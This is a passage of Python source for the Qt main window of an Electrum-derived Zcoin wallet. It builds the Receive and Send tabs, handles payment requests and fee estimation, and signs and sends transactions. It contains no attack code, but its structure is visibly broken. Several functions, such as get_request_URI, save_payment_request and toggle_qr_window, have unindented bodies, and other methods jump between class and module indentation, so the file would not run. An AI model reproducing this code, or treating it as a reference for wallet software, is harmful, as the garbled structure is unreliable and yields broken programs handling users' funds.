        grid.addWidget(self.receive_amount_e, 2, 1)
        self.receive_amount_e.textChanged.connect(self.update_receive_qr)
        self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
        if not self.fx or not self.fx.is_enabled():
            self.fiat_receive_e.setVisible(False)
        grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
        # Two-way sync between coin and fiat amount edits.
        self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
        self.expires_combo = QComboBox()
        self.expires_combo.addItems([i[0] for i in expiration_values])
        self.expires_combo.setCurrentIndex(3)
        self.expires_combo.setFixedWidth(self.receive_amount_e.width())
        msg = ' '.join([
            _('Expiration date of your request.'),
            _('This information is seen by the recipient if you send them a signed payment request.'),
            _('Expired requests have to be deleted manually from your list, in order to free the corresponding Zcoin addresses.'),
            _('The bitcoin address never expires and will always be part of this electrum wallet.'),
        ])
        grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
        grid.addWidget(self.expires_combo, 3, 1)
        # Read-only label shown in place of the combo for saved requests.
        self.expires_label = QLineEdit('')
        self.expires_label.setReadOnly(1)
        self.expires_label.setFocusPolicy(Qt.NoFocus)
        self.expires_label.hide()
        grid.addWidget(self.expires_label, 3, 1)
        self.save_request_button = QPushButton(_('Save'))
        self.save_request_button.clicked.connect(self.save_payment_request)
        self.new_request_button = QPushButton(_('New'))
        self.new_request_button.clicked.connect(self.new_payment_request)
        self.receive_qr = QRCodeWidget(fixedSize=200)
        self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
        self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
        self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
        self.receive_buttons = buttons = QHBoxLayout()
        buttons.addStretch(1)
        buttons.addWidget(self.save_request_button)
        buttons.addWidget(self.new_request_button)
        grid.addLayout(buttons, 4, 1, 1, 2)
        self.receive_requests_label = QLabel(_('Requests'))
        from .request_list import RequestList
        self.request_list = RequestList(self)
        # layout
        vbox_g = QVBoxLayout()
        vbox_g.addLayout(grid)
        vbox_g.addStretch()
        hbox = QHBoxLayout()
        hbox.addLayout(vbox_g)
        hbox.addWidget(self.receive_qr)
        w = QWidget()
        w.setObjectName("receive_container")
        w.searchable_list = self.request_list
        vbox = QVBoxLayout(w)
        vbox.addLayout(hbox)
        vbox.addStretch(1)
        vbox.addWidget(self.receive_requests_label)
        vbox.addWidget(self.request_list)
        vbox.setStretchFactor(self.request_list, 1000)
        return w
    def delete_payment_request(self, addr):
        """Remove the payment request for *addr* and reset the Receive tab."""
        self.wallet.remove_payment_request(addr, self.config)
        self.request_list.update()
        self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
    def sign_payment_request(self, addr):
        """Sign the payment request on *addr* with the configured OpenAlias key.

        Silently does nothing unless an alias is configured, resolved
        (self.alias_info), and its address belongs to this wallet.
        """
        alias = self.config.get('alias')
        alias_privkey = None
        if alias and self.alias_info:
            alias_addr, alias_name, validated = self.alias_info
            if alias_addr:
                if self.wallet.is_mine(alias_addr):
                    msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
                    password = None
                    if self.wallet.has_keystore_encryption():
                        password = self.password_dialog(msg)
                        if not password:
                            # User cancelled the password prompt: abort signing.
                            return
                    try:
                        self.wallet.sign_payment_request(addr, alias, alias_addr, password)
                    except Exception as e:
                        self.show_error(str(e))
                        return
                else:
                    # Alias address is not ours; we cannot sign with it.
                    return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
    def view_and_paste(self, title, msg, data):
        """Show *data* in a modal dialog with a QR view and a copy button."""
        dialog = WindowModalDialog(self, title)
        vbox = QVBoxLayout()
        label = QLabel(msg)
        label.setWordWrap(True)
        vbox.addWidget(label)
        pr_e = ShowQRTextEdit(text=data)
        vbox.addWidget(pr_e)
        vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
        dialog.setLayout(vbox)
        dialog.exec_()
    def export_payment_request(self, addr):
        """Serialize the request on *addr* as BIP70 and save it to a user-chosen file."""
        r = self.wallet.receive_requests.get(addr)
        pr = paymentrequest.serialize_request(r).SerializeToString()
        name = r['id'] + '.bip70'
        fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
        if fileName:
            with open(fileName, "wb+") as f:
                f.write(util.to_bytes(pr))
            self.show_message(_("Request saved successfully"))
            self.saved = True
    def new_payment_request(self):
        """Prepare the Receive tab with a fresh unused address.

        For deterministic wallets that ran out of unused addresses, ask the
        user before forcing creation of a new one (it would not be restored
        automatically from seed).
        """
        addr = self.wallet.get_unused_address()
        if addr is None:
            if not self.wallet.is_deterministic():
                msg = [
                    _('No more addresses in your wallet.'),
                    _('You are using a non-deterministic wallet, which cannot create new addresses.'),
                    _('If you want to create new addresses, use a deterministic wallet instead.')
                   ]
                self.show_message(' '.join(msg))
                return
            if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
                return
            addr = self.wallet.create_new_address(False)
        self.set_receive_address(addr)
        self.expires_label.hide()
        self.expires_combo.show()
        self.new_request_button.setEnabled(False)
        self.receive_message_e.setFocus(1)
    def set_receive_address(self, addr):
        """Show *addr* in the Receive tab and clear description/amount fields."""
        self.receive_address_e.setText(addr)
        self.receive_message_e.setText('')
        self.receive_amount_e.setAmount(None)
    def clear_receive_tab(self):
        """Reset the Receive tab to the wallet's current receiving address."""
        try:
            addr = self.wallet.get_receiving_address() or ''
        except InternalAddressCorruption as e:
            # Surface the corruption but keep the tab usable with no address.
            self.show_error(str(e))
            addr = ''
        self.receive_address_e.setText(addr)
        self.receive_message_e.setText('')
        self.receive_amount_e.setAmount(None)
        self.expires_label.hide()
        self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
    def show_send_tab(self):
        """Switch the main tab widget to the Send tab."""
        self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
    """Switch the main tab widget to the Receive tab."""
    target_index = self.tabs.indexOf(self.receive_tab)
    self.tabs.setCurrentIndex(target_index)
def receive_at(self, addr):
    """Open the Receive tab pre-filled with *addr* (ignored when invalid)."""
    if bitcoin.is_address(addr):
        self.show_receive_tab()
        self.receive_address_e.setText(addr)
        self.new_request_button.setEnabled(True)
def update_receive_qr(self):
    """Rebuild the receive QR code from the current address/amount/message."""
    addr = str(self.receive_address_e.text())
    amount = self.receive_amount_e.get_amount()
    message = self.receive_message_e.text()
    # The request is only saveable once it carries an amount or a message.
    can_save = (amount is not None) or (message != "")
    self.save_request_button.setEnabled(can_save)
    uri = util.create_bip21_uri(addr, amount, message)
    self.receive_qr.setData(uri)
    if self.qr_window and self.qr_window.isVisible():
        # Keep the detached QR window in sync as well.
        self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
    """Paint the receive address red with a tooltip when already used."""
    addr = str(self.receive_address_e.text())
    if not self.wallet.is_used(addr):
        self.receive_address_e.setStyleSheet("")
        self.receive_address_e.setToolTip("")
        return
    # Previously-used address: highlight and warn about privacy implications.
    self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
    self.receive_address_e.setToolTip(_("This address has already been used. "
                                        "For better privacy, do not reuse it for new payments."))
def set_feerounding_text(self, num_satoshis_added):
    """Remember the tooltip text describing the current fee rounding."""
    template = _('Additional {} satoshis are going to be added.')
    self.feerounding_text = template.format(num_satoshis_added)
def create_send_tab(self):
    """Build and return the Send tab widget.

    Lays out the payto/description/amount/fee grid, wires the fee slider
    and the manual fee / feerate editors together, and attaches the
    invoice list below the form.
    """
    # A 4-column grid layout. All the stretch is in the last column.
    # The exchange rate plugin adds a fiat widget in column 2
    self.send_grid = grid = QGridLayout()
    grid.setSpacing(8)
    grid.setColumnStretch(3, 1)
    from .paytoedit import PayToEdit
    self.amount_e = BTCAmountEdit(self.get_decimal_point)
    self.payto_e = PayToEdit(self)
    msg = _('Recipient of the funds.') + '\n\n'\
          + _('You may enter a Zcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Zcoin address)')
    payto_label = HelpLabel(_('Pay to'), msg)
    grid.addWidget(payto_label, 1, 0)
    grid.addWidget(self.payto_e, 1, 1, 1, -1)
    # Autocompletion of contacts in the payto field.
    completer = QCompleter()
    completer.setCaseSensitivity(False)
    self.payto_e.set_completer(completer)
    completer.setModel(self.completions)
    msg = _('Description of the transaction (not mandatory).') + '\n\n'\
          + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
    description_label = HelpLabel(_('Description'), msg)
    grid.addWidget(description_label, 2, 0)
    self.message_e = MyLineEdit()
    grid.addWidget(self.message_e, 2, 1, 1, -1)
    # 'From' row: shown only when coins are manually selected.
    self.from_label = QLabel(_('From'))
    grid.addWidget(self.from_label, 3, 0)
    self.from_list = FromList(self, self.from_list_menu)
    grid.addWidget(self.from_list, 3, 1, 1, -1)
    self.set_pay_from([])
    msg = _('Amount to be sent.') + '\n\n' \
          + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
          + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
          + _('Keyboard shortcut: type "!" to send all your coins.')
    amount_label = HelpLabel(_('Amount'), msg)
    grid.addWidget(amount_label, 4, 0)
    grid.addWidget(self.amount_e, 4, 1)
    # Fiat mirror of the amount field (exchange-rate plugin).
    self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
    if not self.fx or not self.fx.is_enabled():
        self.fiat_send_e.setVisible(False)
    grid.addWidget(self.fiat_send_e, 4, 2)
    self.amount_e.frozen.connect(
        lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
    self.max_button = EnterButton(_("Max"), self.spend_max)
    self.max_button.setFixedWidth(self.amount_e.width())
    self.max_button.setCheckable(True)
    grid.addWidget(self.max_button, 4, 3)
    hbox = QHBoxLayout()
    hbox.addStretch(1)
    grid.addLayout(hbox, 4, 4)
    msg = _('Zcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
          + _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
          + _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
    self.fee_e_label = HelpLabel(_('Fee'), msg)
    def fee_cb(dyn, pos, fee_rate):
        # Slider callback: persist the chosen fee level / rate and refresh.
        if dyn:
            if self.config.use_mempool_fees():
                self.config.set_key('depth_level', pos, False)
            else:
                self.config.set_key('fee_level', pos, False)
        else:
            self.config.set_key('fee_per_kb', fee_rate, False)
        if fee_rate:
            fee_rate = Decimal(fee_rate)
            self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
        else:
            self.feerate_e.setAmount(None)
        self.fee_e.setModified(False)
        self.fee_slider.activate()
        self.spend_max() if self.max_button.isChecked() else self.update_fee()
    self.fee_slider = FeeSlider(self, self.config, fee_cb)
    self.fee_slider.setFixedWidth(self.amount_e.width())
    def on_fee_or_feerate(edit_changed, editing_finished):
        # Manual fee and feerate editors are mutually exclusive; editing one
        # unfreezes the other and deactivates the slider.
        edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
        if editing_finished:
            if edit_changed.get_amount() is None:
                # This is so that when the user blanks the fee and moves on,
                # we go back to auto-calculate mode and put a fee back.
                edit_changed.setModified(False)
        else:
            # edit_changed was edited just now, so make sure we will
            # freeze the correct fee setting (this)
            edit_other.setModified(False)
        self.fee_slider.deactivate()
        self.update_fee()
    class TxSizeLabel(QLabel):
        # Read-only label showing the estimated tx size in the fee row.
        def setAmount(self, byte_size):
            self.setText(('x %s bytes =' % byte_size) if byte_size else '')
    self.size_e = TxSizeLabel()
    self.size_e.setAlignment(Qt.AlignCenter)
    self.size_e.setAmount(0)
    self.size_e.setFixedWidth(self.amount_e.width())
    self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
    self.feerate_e = FeerateEdit(lambda: 0)
    self.feerate_e.setAmount(self.config.fee_per_byte())
    self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
    self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
    self.fee_e = BTCAmountEdit(self.get_decimal_point)
    self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
    self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
    def feerounding_onclick():
        # Explain why the displayed fee may differ from the computed one.
        text = (self.feerounding_text + '\n\n' +
                _('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
                _('At most 100 satoshis might be lost due to this rounding.') + ' ' +
                _("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
                _('Also, dust is not kept as change, but added to the fee.') + '\n' +
                _('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
        self.show_message(title=_('Fee rounding'), msg=text)
    self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
    self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
    self.feerounding_icon.setFlat(True)
    self.feerounding_icon.clicked.connect(feerounding_onclick)
    self.feerounding_icon.setVisible(False)
    self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
    vbox_feelabel = QVBoxLayout()
    vbox_feelabel.addWidget(self.fee_e_label)
    vbox_feelabel.addStretch(1)
    grid.addLayout(vbox_feelabel, 5, 0)
    self.fee_adv_controls = QWidget()
    hbox = QHBoxLayout(self.fee_adv_controls)
    hbox.setContentsMargins(0, 0, 0, 0)
    hbox.addWidget(self.feerate_e)
    hbox.addWidget(self.size_e)
    hbox.addWidget(self.fee_e)
    hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
    hbox.addStretch(1)
    vbox_feecontrol = QVBoxLayout()
    vbox_feecontrol.addWidget(self.fee_adv_controls)
    vbox_feecontrol.addWidget(self.fee_slider)
    grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
    if not self.config.get('show_fee', False):
        self.fee_adv_controls.setVisible(False)
    self.preview_button = EnterButton(_("Preview"), self.do_preview)
    self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
    self.send_button = EnterButton(_("Send"), self.do_send)
    self.clear_button = EnterButton(_("Clear"), self.do_clear)
    buttons = QHBoxLayout()
    buttons.addStretch(1)
    buttons.addWidget(self.clear_button)
    buttons.addWidget(self.preview_button)
    buttons.addWidget(self.send_button)
    grid.addLayout(buttons, 6, 1, 1, 3)
    self.amount_e.shortcut.connect(self.spend_max)
    self.payto_e.textChanged.connect(self.update_fee)
    self.amount_e.textEdited.connect(self.update_fee)
    def reset_max(text):
        # Typing an explicit amount cancels 'Max' mode.
        self.max_button.setChecked(False)
        enable = not bool(text) and not self.amount_e.isReadOnly()
        self.max_button.setEnabled(enable)
    self.amount_e.textEdited.connect(reset_max)
    self.fiat_send_e.textEdited.connect(reset_max)
    def entry_changed():
        # Color-code the amount/fee/feerate fields: red for insufficient
        # funds, blue for auto-filled values, default for user-entered ones.
        text = ""
        amt_color = ColorScheme.DEFAULT
        fee_color = ColorScheme.DEFAULT
        feerate_color = ColorScheme.DEFAULT
        if self.not_enough_funds:
            amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
            feerate_color = ColorScheme.RED
            text = _("Not enough funds")
            c, u, x = self.wallet.get_frozen_balance()
            if c+u+x:
                text += " ({} {} {})".format(
                    self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
                )
        # blue color denotes auto-filled values
        elif self.fee_e.isModified():
            feerate_color = ColorScheme.BLUE
        elif self.feerate_e.isModified():
            fee_color = ColorScheme.BLUE
        elif self.amount_e.isModified():
            fee_color = ColorScheme.BLUE
            feerate_color = ColorScheme.BLUE
        else:
            amt_color = ColorScheme.BLUE
            fee_color = ColorScheme.BLUE
            feerate_color = ColorScheme.BLUE
        self.statusBar().showMessage(text)
        self.amount_e.setStyleSheet(amt_color.as_stylesheet())
        self.fee_e.setStyleSheet(fee_color.as_stylesheet())
        self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
    self.amount_e.textChanged.connect(entry_changed)
    self.fee_e.textChanged.connect(entry_changed)
    self.feerate_e.textChanged.connect(entry_changed)
    # Invoice list lives below the send form.
    self.invoices_label = QLabel(_('Invoices'))
    from .invoice_list import InvoiceList
    self.invoice_list = InvoiceList(self)
    vbox0 = QVBoxLayout()
    vbox0.addLayout(grid)
    hbox = QHBoxLayout()
    hbox.addLayout(vbox0)
    w = QWidget()
    w.setObjectName("send_container")
    vbox = QVBoxLayout(w)
    vbox.addLayout(hbox)
    vbox.addStretch(1)
    vbox.addWidget(self.invoices_label)
    vbox.addWidget(self.invoice_list)
    vbox.setStretchFactor(self.invoice_list, 1000)
    w.searchable_list = self.invoice_list
    run_hook('create_send_tab', grid)
    return w
def spend_max(self):
    """Check the Max button and recompute the fee, spending all coins."""
    if not run_hook('abort_send', self):
        self.max_button.setChecked(True)
        self.do_update_fee()
def update_fee(self):
    """Flag that the fee must be recalculated by the periodic updater."""
    setattr(self, 'require_fee_update', True)
def get_payto_or_dummy(self):
    """Return the recipient from the payto field, or a dummy wallet address."""
    recipient = self.payto_e.get_recipient()
    return recipient if recipient else (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
    '''Recalculate the fee. If the fee was manually input, retain it, but
    still build the TX to see if there are enough funds.

    Updates the fee, feerate and size fields, the fee-rounding icon, and
    (in Max mode) the amount field.
    '''
    freeze_fee = self.is_send_fee_frozen()
    freeze_feerate = self.is_send_feerate_frozen()
    amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
    if amount is None:
        # Nothing to compute yet; clear state unless the fee is user-set.
        if not freeze_fee:
            self.fee_e.setAmount(None)
        self.not_enough_funds = False
        self.statusBar().showMessage('')
        return
    outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
    if not outputs:
        # No outputs typed yet: estimate against a placeholder recipient.
        _type, addr = self.get_payto_or_dummy()
        outputs = [TxOutput(_type, addr, amount)]
    is_sweep = bool(self.tx_external_keypairs)
    make_tx = lambda fee_est: \
        self.wallet.make_unsigned_transaction(
            coins, outputs, self.config,
            fixed_fee=fee_est, is_sweep=is_sweep)
    try:
        tx = make_tx(fee_estimator)
        self.not_enough_funds = False
    except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
        if not freeze_fee:
            self.fee_e.setAmount(None)
        if not freeze_feerate:
            self.feerate_e.setAmount(None)
        self.feerounding_icon.setVisible(False)
        if isinstance(e, NotEnoughFunds):
            self.not_enough_funds = True
        elif isinstance(e, NoDynamicFeeEstimates):
            # Still display the estimated size using a zero-fee tx.
            try:
                tx = make_tx(0)
                size = tx.estimated_size()
                self.size_e.setAmount(size)
            except BaseException:
                pass
        return
    except BaseException:
        self.logger.exception('')
        return
    size = tx.estimated_size()
    self.size_e.setAmount(size)
    fee = tx.get_fee()
    fee = None if self.not_enough_funds else fee
    # Displayed fee/fee_rate values are set according to user input.
    # Due to rounding or dropping dust in CoinChooser,
    # actual fees often differ somewhat.
    if freeze_feerate or self.fee_slider.is_active():
        displayed_feerate = self.feerate_e.get_amount()
        if displayed_feerate is not None:
            displayed_feerate = quantize_feerate(displayed_feerate)
        else:
            # fallback to actual fee
            displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
            self.feerate_e.setAmount(displayed_feerate)
        displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
        self.fee_e.setAmount(displayed_fee)
    else:
        if freeze_fee:
            displayed_fee = self.fee_e.get_amount()
        else:
            # fallback to actual fee if nothing is frozen
            displayed_fee = fee
            self.fee_e.setAmount(displayed_fee)
        displayed_fee = displayed_fee if displayed_fee else 0
        displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
        self.feerate_e.setAmount(displayed_feerate)
    # show/hide fee rounding icon
    feerounding = (fee - displayed_fee) if fee else 0
    self.set_feerounding_text(int(feerounding))
    self.feerounding_icon.setToolTip(self.feerounding_text)
    self.feerounding_icon.setVisible(abs(feerounding) >= 1)
    if self.max_button.isChecked():
        # In Max mode the amount is derived from the tx, net of plugin fees.
        amount = tx.output_value()
        __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
        amount_after_all_fees = amount - x_fee_amount
        self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
    """Drop *item* from the manual coin-selection list and refresh."""
    position = self.from_list.indexOfTopLevelItem(item)
    del self.pay_from[position]
    self.redraw_from_list()
    self.update_fee()
def from_list_menu(self, position):
    """Context menu for the 'From' coin list: allows removing an entry."""
    item = self.from_list.itemAt(position)
    menu = QMenu()
    menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
    menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
    """Replace the manual coin selection with *coins* and redraw the list."""
    self.pay_from = [coin for coin in coins]
    self.redraw_from_list()
def redraw_from_list(self):
    """Repopulate the 'From' list from self.pay_from; hide it when empty."""
    self.from_list.clear()
    self.from_label.setHidden(len(self.pay_from) == 0)
    self.from_list.setHidden(len(self.pay_from) == 0)
    def format(x):
        # "txid_prefix...txid_suffix:n <tab> address"
        h = x.get('prevout_hash')
        return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
    for item in self.pay_from:
        self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
    """Return a payto string for contact *key*: 'label <addr>' for addresses."""
    kind, label = self.contacts.get(key)
    if kind == 'address':
        return '{} <{}>'.format(label, key)
    return key
def update_completions(self):
    """Refresh the payto autocompletion strings from the contact list."""
    entries = list(map(self.get_contact_payto, self.contacts.keys()))
    self.completions.setStringList(entries)
def protected(func):
    '''Password request wrapper. The password is passed to the function
    as the 'password' named argument. "None" indicates either an
    unencrypted wallet, or the user cancelled the password request.
    An empty input is passed as the empty string.'''
    def request_password(self, *args, **kwargs):
        parent = self.top_level_window()
        password = None
        # Keep prompting until the password verifies or the user cancels.
        while self.wallet.has_keystore_encryption():
            password = self.password_dialog(parent=parent)
            if password is None:
                # User cancelled password input
                return
            try:
                self.wallet.check_password(password)
                break
            except Exception as e:
                self.show_error(str(e), parent=parent)
                continue
        kwargs['password'] = password
        return func(self, *args, **kwargs)
    return request_password
def is_send_fee_frozen(self):
    """Whether the absolute-fee field currently holds a user-entered value."""
    field = self.fee_e
    return field.isVisible() and field.isModified() \
        and (field.text() or field.hasFocus())
def is_send_feerate_frozen(self):
    """Whether the feerate field currently holds a user-entered value."""
    field = self.feerate_e
    return field.isVisible() and field.isModified() \
        and (field.text() or field.hasFocus())
def get_send_fee_estimator(self):
    """Return the frozen fee (sat), a feerate-based estimator, or None."""
    if self.is_send_fee_frozen():
        # The user typed an absolute fee: use it verbatim.
        return self.fee_e.get_amount()
    if self.is_send_feerate_frozen():
        per_byte = self.feerate_e.get_amount()  # sat/byte feerate
        per_kb = 0 if per_byte is None else per_byte * 1000  # sat/kilobyte feerate
        return partial(
            simple_config.SimpleConfig.estimate_fee_for_feerate, per_kb)
    # Neither field is frozen: let the wallet pick the fee.
    return None
def read_send_tab(self):
    """Collect (outputs, fee_estimator, label, coins) from the Send tab."""
    label = self.message_e.text()
    pr = self.payment_request
    if pr:
        outputs = pr.get_outputs()
    else:
        outputs = self.payto_e.get_outputs(self.max_button.isChecked())
    return outputs, self.get_send_fee_estimator(), label, self.get_coins()
def check_send_tab_outputs_and_show_errors(self, outputs) -> bool:
    """Returns whether there are errors with outputs.
    Also shows error dialog to user if so.
    """
    pr = self.payment_request
    if pr:
        if pr.has_expired():
            self.show_error(_('Payment request has expired'))
            return True
    if not pr:
        # Free-form payto entry: report parse errors line by line.
        errors = self.payto_e.get_errors()
        if errors:
            self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
            return True
        # An alias that failed DNSSEC validation needs explicit consent.
        if self.payto_e.is_alias and self.payto_e.validated is False:
            alias = self.payto_e.toPlainText()
            msg = _('WARNING: the alias "{}" could not be validated via an additional '
                    'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
            msg += _('Do you wish to continue?')
            if not self.question(msg):
                return True
    if not outputs:
        self.show_error(_('No outputs'))
        return True
    # Per-output sanity checks: address present, valid, amount present.
    for o in outputs:
        if o.address is None:
            self.show_error(_('Zcoin Address is None'))
            return True
        if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
            self.show_error(_('Invalid Zcoin Address'))
            return True
        if o.value is None:
            self.show_error(_('Invalid Amount'))
            return True
    return False  # no errors
def do_preview(self):
    """Build the transaction and display it instead of broadcasting."""
    self.do_send(preview=True)
def do_send(self, preview = False):
    """Build, confirm, sign and (unless *preview*) broadcast a transaction.

    Reads the Send tab, validates outputs, builds an unsigned transaction,
    warns about low/high fees, asks for confirmation (and password when the
    keystore is encrypted), then signs and broadcasts.
    """
    if run_hook('abort_send', self):
        return
    outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
    if self.check_send_tab_outputs_and_show_errors(outputs):
        return
    try:
        is_sweep = bool(self.tx_external_keypairs)
        tx = self.wallet.make_unsigned_transaction(
            coins, outputs, self.config, fixed_fee=fee_estimator,
            is_sweep=is_sweep)
    except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
        self.show_message(str(e))
        return
    except InternalAddressCorruption as e:
        self.show_error(str(e))
        raise
    except BaseException as e:
        self.logger.exception('')
        self.show_message(str(e))
        return
    amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
    fee = tx.get_fee()
    use_rbf = self.config.get('use_rbf', True)
    if use_rbf:
        tx.set_rbf(True)
    # Warn when the fee is below the server's relay fee for this tx size.
    if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
        # Fixed typo in user-facing message: "recomended" -> "recommended".
        msgText = '\n'.join([
            _("Your current server requires a higher fee to successfully propagate this transaction."),
            _("It is recommended to raise your transaction fee or use a server with a lower relay fee."),
            _("Try sending the transaction with the current fee?")
        ])
        if not self.question(msgText):
            return
    if preview:
        self.show_transaction(tx, tx_desc)
        return
    if not self.network:
        self.show_error(_("You can't broadcast a transaction without a live network connection."))
        return
    # confirmation dialog
    msg = [
        _("Amount to be sent") + ": " + self.format_amount_and_units(amount),
        _("Mining fee") + ": " + self.format_amount_and_units(fee),
    ]
    x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
    if x_fee:
        x_fee_address, x_fee_amount = x_fee
        msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
    # Warn about an unusually high fee rate.
    feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
    if fee > feerate_warning * tx.estimated_size() / 1000:
        msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
    if self.wallet.has_keystore_encryption():
        msg.append("")
        msg.append(_("Enter your password to proceed"))
        password = self.password_dialog('\n'.join(msg))
        if not password:
            return
    else:
        msg.append(_('Proceed?'))
        password = None
        if not self.question('\n'.join(msg)):
            return
    def sign_done(success):
        # Incomplete (e.g. multisig) transactions are shown instead of sent.
        if success:
            if not tx.is_complete():
                self.show_transaction(tx)
                self.do_clear()
            else:
                self.broadcast_transaction(tx, tx_desc)
    self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
    """Sign *tx*; @protected prompts for the wallet password first."""
    self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
    '''Sign the transaction in a separate thread. When done, calls
    the callback with a success code of True or False.
    '''
    def on_success(result):
        callback(True)
    def on_failure(exc_info):
        self.on_error(exc_info)
        callback(False)
    # Plugins (e.g. 2FA) may wrap the success callback.
    on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
    if self.tx_external_keypairs:
        # can sign directly
        task = partial(Transaction.sign, tx, self.tx_external_keypairs)
    else:
        task = partial(self.wallet.sign_transaction, tx, password)
    msg = _('Signing transaction...')
    WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
    """Broadcast *tx* on a worker thread, then report the result in the GUI.

